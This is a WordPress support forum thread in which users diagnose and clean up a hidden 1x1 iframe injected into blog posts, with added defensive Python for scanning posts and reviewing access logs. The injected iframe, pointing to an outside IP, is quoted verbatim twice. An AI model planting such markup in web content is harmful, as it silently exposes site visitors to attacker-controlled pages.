Title: iframe injection problem?
Last modified: August 18, 2016

---

# iframe injection problem?

 *  [lostplay](https://wordpress.org/support/users/lostplay/)
 * (@lostplay)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/)
 * Hi,
 * I’ve searched around for a resolution to my problem but the closest thread I can
   find is this: [http://wordpress.org/support/topic/89912?replies=4](http://wordpress.org/support/topic/89912?replies=4)
 * Basically, about a week ago my site began experiencing problems whenever I tried
   to access the home page > [http://www.heroes-hype.com](http://www.heroes-hype.com).
   The screen just freezes for about 10 minutes. Sometimes it also throws me out
   (closes the browser). In the browser footer it displays the following:
 * waiting for [http://xx.xx.xx.xx./iframe/wp-stats.php](http://xx.xx.xx.xx./iframe/wp-stats.php)
 * (the ‘x’ is an IP address which I don’t recognise)
 * At first I suspected that it was a problem with the wp-stats plugin which I had
   just installed prior to this problem surfacing. So I removed the plugin (and
   other plugins). I also tried other themes and browsers, but a week later the
   problem still remains.
 * So I contacted my host (as one of the threads here suggested I do) and they have
   reported to me the following:
 * “Your site was most likely injected with a 1px iframe due to a vulnerability 
   in WordPress — which is why 2.2.3 was rushed out and pushed out to everyone. 
   A number of sites have the same link which leads one to believe it was due to
   an exploit in either WordPress itself or the theme you’re using (which has also
   been called into question as of late).”
 * So now I’m wondering whether anyone can corroborate that this is the likely reason,
   and whether there is anything I can do to resolve the problem. I would of course
   like to upgrade to 2.3 asap, but I doubt this will solve the issue in itself..
   or will it?
 * Any advice would be much appreciated.
 * PS I am using the CSS Freak theme.

Viewing 15 replies - 1 through 15 (of 89 total)


 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622649)
 * what is the xx.xx…
 * and you say the problem persists, after removing the stats plugin? I don’t see
   the code on your site.
 * Without seeing the xx.xx.xx.xx.. it’s hard to say much.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622653)
 * `http://61.132.75.71/iframe/wp-stats.php`
 * that? that goes to China, that’s prolly not good.
 *  Thread Starter [lostplay](https://wordpress.org/support/users/lostplay/)
 * (@lostplay)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622655)
 * Hi,
 * Yes, that’s the IP address..
 * Yep, I removed the wp-stats plugin because I originally assumed it was at fault
   and because I wanted to ensure that I had covered the basics before asking for
   advice.
 * Thanks for the feedback – do you (or anyone else) have any ideas on how to resolve
   this?
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622657)
 * It’s not on your single post pages .. have you looked inside your theme files?
   I would start there with looking at index.php
 * Look inside THIS post:
 * [http://heroes-hype.com/heroes-clues-global-tv-promo](http://heroes-hype.com/heroes-clues-global-tv-promo)
 *  Moderator [Samuel Wood (Otto)](https://wordpress.org/support/users/otto42/)
 * (@otto42)
 * WordPress.org Admin
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622662)
 * Step 1: Find where the code is being inserted. From what whooami is saying, it’s
   likely inside the content of one specific post. So look through that post and
   find and remove it.
 * Step 2: Upgrade to the current latest WordPress version (2.2.3). This has no 
   known security issues at this time.
 * Step 3: Keep up to date on WordPress releases. On the main dashboard, you’ll 
   always see new release information. Also, in WordPress 2.3 and up, WordPress 
   itself will start telling you when your version is out of date and give you info
   on how to upgrade. So that will be good.
 * Given that the code is inside a post’s content, then I’d say yeah, they likely
   did it through the exploit in version 2.2. Upgrade to 2.2.3, right now.
 *  Thread Starter [lostplay](https://wordpress.org/support/users/lostplay/)
 * (@lostplay)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622666)
 * whooami – you’re a star! There was the following iframe inside that post:
 * `<!-- Traffic Statistics --> <iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->`
 * So does this mean they were attempting to track my stats/traffic? Hmm..very nasty
   stuff. I have now removed it from that post.
 * Otto42 – thank you for your help and advice also! I’m going to do as you advise
   and upgrade asap.
 * Thanks again, I suspect that you have both saved me hours of stress!
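
The markup quoted above is a 1x1 iframe with unquoted attributes, so a plain text search for `<iframe` finds it but cannot tell it apart from ordinary embeds. The following Python scanner is an added example, not code from this thread or from WordPress: it flags hidden iframes in exported post content, and `SITE_HOSTS`, `MAX_HIDDEN_PX`, the sample rows and the 203.0.113.10 documentation address are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOSTS = {"heroes-hype.com", "www.heroes-hype.com"}  # assumption: the blog's own hosts
MAX_HIDDEN_PX = 2  # assumption: frames this small are effectively invisible

def _px(value):
    """Parse a width/height attribute as pixels; None if absent or not a plain number."""
    v = (value or "").strip().lower()
    v = v[:-2] if v.endswith("px") else v
    return int(v) if v.isdigit() else None

class _IframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)  # html.parser lowercases names and accepts unquoted values
        src = a.get("src") or ""
        host = urlparse(src).hostname or ""  # empty for relative URLs
        reasons = []
        sizes = [_px(a.get("width")), _px(a.get("height"))]
        if any(s is not None and s <= MAX_HIDDEN_PX for s in sizes):
            reasons.append("tiny-frame")
        style = (a.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("css-hidden")
        if reasons:  # only hidden frames are reported; ordinary embeds pass
            self.findings.append({"src": src, "host": host, "reasons": reasons,
                                  "external": bool(host) and host not in SITE_HOSTS})

def scan_posts(posts):
    """posts: iterable of (post_id, post_content) pairs, e.g. rows exported from wp_posts."""
    hits = []
    for post_id, content in posts:
        finder = _IframeFinder()
        finder.feed(content)
        finder.close()
        hits.extend({"post_id": post_id, **f} for f in finder.findings)
    return hits

# Constructed sample rows; 203.0.113.10 is a documentation address, not the thread's host.
SAMPLE_POSTS = [
    (41, '<p>Promo clip:</p><iframe src="https://video.example/embed/1" width="425" height="350"></iframe>'),
    (42, "<p>Clues</p><!-- Traffic Statistics --> <iframe src=http://203.0.113.10/iframe/wp-stats.php\n"
         "width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->"),
]
```

Calling `scan_posts(SAMPLE_POSTS)` reports only post 42; the normally sized video embed in post 41 is left alone.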
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622668)
 * _So does this mean they were attempting to track my stats/traffic?_
 * who knows, it would almost be interesting to make up a site that forges a referer
   that’s a wp blog and see if anything can be figured out. I really can’t see any way
   that they can glean anything worthwhile.
 *  Thread Starter [lostplay](https://wordpress.org/support/users/lostplay/)
 * (@lostplay)
 * [18 years, 6 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622672)
 * Hmm, it’s a strange one indeed. Anyway thanks for the heads-up 🙂
 *  [toread](https://wordpress.org/support/users/toread/)
 * (@toread)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622848)
 * Happened today on 2.3.1 site. The injected code was:
 * `<!-- Traffic Statistics --> <iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->`
 * Inside wp-stats.php is JavaScript code. Host 61.132.75.71 is in China. When can
   we expect a patch?
 *  [scchu](https://wordpress.org/support/users/scchu/)
 * (@scchu)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622849)
 * Yup. The same thing happened to me. Running 2.3. I thought it must’ve been an exploit
   for 2.3. But it turns out 2.3.1 is also vulnerable. I am not feeling too comfortable
   with this actually. And I just noticed it in a post I did 2 days ago!! Now I 
   gotta go back and dig them out… Argh…
 *  [daxman](https://wordpress.org/support/users/daxman/)
 * (@daxman)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622851)
 * Happened to me too.
 *  [Chris Roberts](https://wordpress.org/support/users/columcille/)
 * (@columcille)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622852)
 * Glad to find others discussing this. I’ve just noticed the same thing turning
   up in my blog, running v2.3. Was about to update to 2.3.1 but I see from comments
   on here that it is vulnerable as well.
 * Any idea what hole these are crawling through?
 *  [Chris Roberts](https://wordpress.org/support/users/columcille/)
 * (@columcille)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622853)
 * Opened a ticket: [http://trac.wordpress.org/ticket/5313](http://trac.wordpress.org/ticket/5313)
 *  Moderator [Dion Hulse](https://wordpress.org/support/users/dd32/)
 * (@dd32)
 * Meta Developer
 * [18 years, 5 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622854)
 * Can anyone take a read through their web server’s access logs and look for anything
   suspect accessing the admin pages?
 * Also check for other users, and change the admin passwords. It is hard to work
   out what is happening here without knowing where the problem is coming from.
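
One way to run the access-log review requested above, as an added example that is not part of the thread: this Python function groups POST requests to the admin, login and XML-RPC endpoints by client address and skips addresses the owner recognises. It assumes Combined Log Format and WordPress installed at the web root; `KNOWN_ADMIN_IPS` and the sample log lines are constructed.

```python
import re
from collections import defaultdict

# Combined Log Format: ip ident user [time] "METHOD path proto" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Endpoints through which a login can happen or post content can be written.
WRITE_PATHS = ("/wp-admin/", "/wp-login.php", "/xmlrpc.php")
KNOWN_ADMIN_IPS = {"198.51.100.5"}  # assumption: where the site owner logs in from

def suspect_admin_writes(lines, known_ips=KNOWN_ADMIN_IPS):
    """Return {client_ip: [(time, path, status), ...]} for POSTs from unknown addresses."""
    by_ip = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue  # unparseable line, or a read-only request
        path = m["path"].split("?", 1)[0]  # ignore the query string when matching
        if not path.startswith(WRITE_PATHS) or m["ip"] in known_ips:
            continue
        by_ip[m["ip"]].append((m["time"], path, int(m["status"])))
    return dict(by_ip)

# Constructed sample lines (documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '198.51.100.5 - - [05/Nov/2007:10:01:12 +0000] "POST /wp-admin/post.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '203.0.113.10 - - [05/Nov/2007:03:14:07 +0000] "POST /xmlrpc.php HTTP/1.0" 200 512 "-" "-"',
    '203.0.113.10 - - [05/Nov/2007:03:14:09 +0000] "POST /wp-admin/post.php?action=edit HTTP/1.0" 302 - "-" "-"',
    '192.0.2.44 - - [05/Nov/2007:09:00:00 +0000] "GET /wp-admin/ HTTP/1.1" 302 - "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, events in suspect_admin_writes(SAMPLE_LOG).items():
        print(ip, events)
```

Timestamps in the result can then be compared with the modification time of the post that carried the iframe.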
 *  [Lloyd Budd](https://wordpress.org/support/users/lloydbudd/)
 * (@lloydbudd)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/iframe-injection-problem/#post-622855)
 * Inserting an iframe of that style is the common injection by at least one black
   hat SEO ring — I’ve heard of that injection [http://xx.xx.xx.xx./iframe/wp-stats.php](http://xx.xx.xx.xx./iframe/wp-stats.php)
   being on a Joomla! site.
 * Columcille, it’s still advisable to upgrade to 2.3.1 as it does address security
   issues. Including what WP theme, plugins, and other s/w is running on your host
   will help isolate the vector of the exploit.


The topic ‘iframe injection problem?’ is closed to new replies.

## Tags

 * [iframe](https://wordpress.org/support/topic-tag/iframe/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 89 replies
 * 41 participants
 * Last reply from: [stoned](https://wordpress.org/support/users/stoned/)
 * Last activity: [17 years, 11 months ago](https://wordpress.org/support/topic/iframe-injection-problem/page/6/#post-622962)
 * Status: not resolved

